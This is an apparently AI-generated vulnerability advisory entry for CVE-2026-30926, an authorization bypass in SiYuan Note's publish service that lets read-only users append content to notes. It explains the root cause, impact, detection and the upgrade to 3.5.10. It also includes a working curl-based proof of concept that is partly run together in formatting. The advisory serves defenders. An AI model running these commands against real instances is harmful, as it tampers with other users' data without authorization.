
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-30926 is an authorization bypass vulnerability in SiYuan Note's publish service that allows authenticated low-privilege users (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint. It affects all versions of SiYuan (b3log/siyuan) prior to 3.5.10. The vulnerability was published on March 7, 2026, and patched in version 3.5.10 released the same day. It carries a CVSS v3.1 base score of 7.1 (High) (GitHub Advisory, GHSA).
The root cause is classified as CWE-284 (Improper Access Control) and CWE-862 (Missing Authorization). In router.go, the /api/block/appendHeadingChildren endpoint is registered with only model.CheckAuth as its authorization middleware, which accepts sessions from RoleReader (read-only) accounts. The handler calls model.AppendHeadingChildren(id, childrenDOM), which ultimately invokes indexWriteTreeUpsertQueue(tree) in model/block.go to persist document mutations — without enforcing CheckAdminRole or CheckReadonly. Because session.go's CheckAuth does not differentiate between read-only and write-privileged roles, any authenticated publish user can perform persistent write operations (GitHub Advisory).
Successful exploitation allows any authenticated publish user with read-only privileges to append arbitrary content blocks to existing documents, compromising the integrity of stored notes. Potential impacts include unauthorized modification of private notes, content tampering in published notebooks, and loss of data integrity. There is also a risk of chaining this vulnerability with other API endpoints to escalate privileges further, though no availability impact is expected (GitHub Advisory, GHSA).
A complete proof-of-concept exploit consisting of sequential curl commands is publicly available in the GitHub Security Advisory (GitHub Advisory). The vulnerability requires only low-privilege authenticated access (a valid RoleReader publish account) and no user interaction, making it straightforward to exploit. The EPSS score is approximately 0.011% (0.000110), indicating a low but non-zero probability of exploitation in the wild within 30 days. There is no evidence of active in-the-wild exploitation or threat actor attribution at this time, and it is not listed in the CISA KEV catalog (GHSA).
curl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{"stmt":"SELECT id,root_id FROM blocks WHERE content=\'VictimHeading\' LIMIT 1"}' \
http://<target>:6808/api/query/sqlcurl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{"dom":"InjectedByReader"}' \
http://<target>:6808/api/lute/html2BlockDOM/api/block/appendHeadingChildren with the retrieved block ID and the generated DOM payload:curl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{ "id":"<heading-block-id>", "childrenDOM":"<generated-dom>" }' \
http://<target>:6808/api/block/appendHeadingChildren{"code":0} on success (GitHub Advisory)./api/block/appendHeadingChildren on the publish service port (default 6808) originating from accounts with RoleReader privileges; POST requests to /api/lute/html2BlockDOM from read-only publish accounts./api/block/appendHeadingChildren; SQL query API calls from publish accounts enumerating block IDs (/api/query/sql with SELECT id,root_id FROM blocks)..sy document files within the SiYuan workspace directory, particularly new blocks appended to existing headings not created by admin users.Upgrade SiYuan to version 3.5.10 or later, which enforces proper role-based authorization checks on write endpoints. As an interim workaround, disable the publish service entirely or restrict network access to the publish service port (default 6808) to trusted users only. Administrators should also audit notebook content for unauthorized modifications made by read-only publish accounts prior to patching (GitHub Advisory, GHSA).
The vulnerability was reported by security researcher Zwique and disclosed via GitHub's coordinated disclosure process. An openSUSE security announcement was issued referencing the advisory. Community discussion was observed on Bluesky and aggregated by threat intelligence platforms including Feedly and Qualys (detection ID 761789). No major media coverage or notable vendor statements beyond the official advisory have been identified (GHSA, GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."